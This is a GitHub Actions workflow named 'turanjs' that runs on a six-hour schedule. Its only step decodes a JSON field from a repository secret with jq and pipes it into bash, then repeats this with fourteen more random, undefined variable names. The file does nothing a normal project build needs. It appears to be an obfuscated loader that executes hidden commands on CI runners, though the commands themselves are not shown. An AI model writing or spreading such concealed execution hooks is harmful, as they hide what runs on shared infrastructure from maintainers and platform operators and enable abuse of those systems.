name: turanjs
on:
  workflow_dispatch:
  schedule:
    - cron: '31 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: turanjs
        env:
          vinps744: ${{ secrets.vinps744 }}
        run: |
          echo $vinps744 | jq -r .y3 | /bin/bash
          echo $cvvhp060 | jq -r .bjz039 | /bin/bash
          echo $hedb02374 | jq -r .nga68569 | /bin/bash
          echo $mu17 | jq -r .jiiy9 | /bin/bash
          echo $p987 | jq -r .p251 | /bin/bash
          echo $kjg0 | jq -r .utl119 | /bin/bash
          echo $ee5 | jq -r .inmn0793 | /bin/bash
          echo $uqqi0205 | jq -r .x6982 | /bin/bash
          echo $o79 | jq -r .hsg2 | /bin/bash
          echo $yooy5 | jq -r .brur8 | /bin/bash
          echo $evy80 | jq -r .n13030 | /bin/bash
          echo $biia20 | jq -r .p54 | /bin/bash
          echo $oy0102 | jq -r .f42356 | /bin/bash
          echo $uy0760 | jq -r .ub354 | /bin/bash
          echo $glrm9028 | jq -r .iyniv13 | /bin/bash

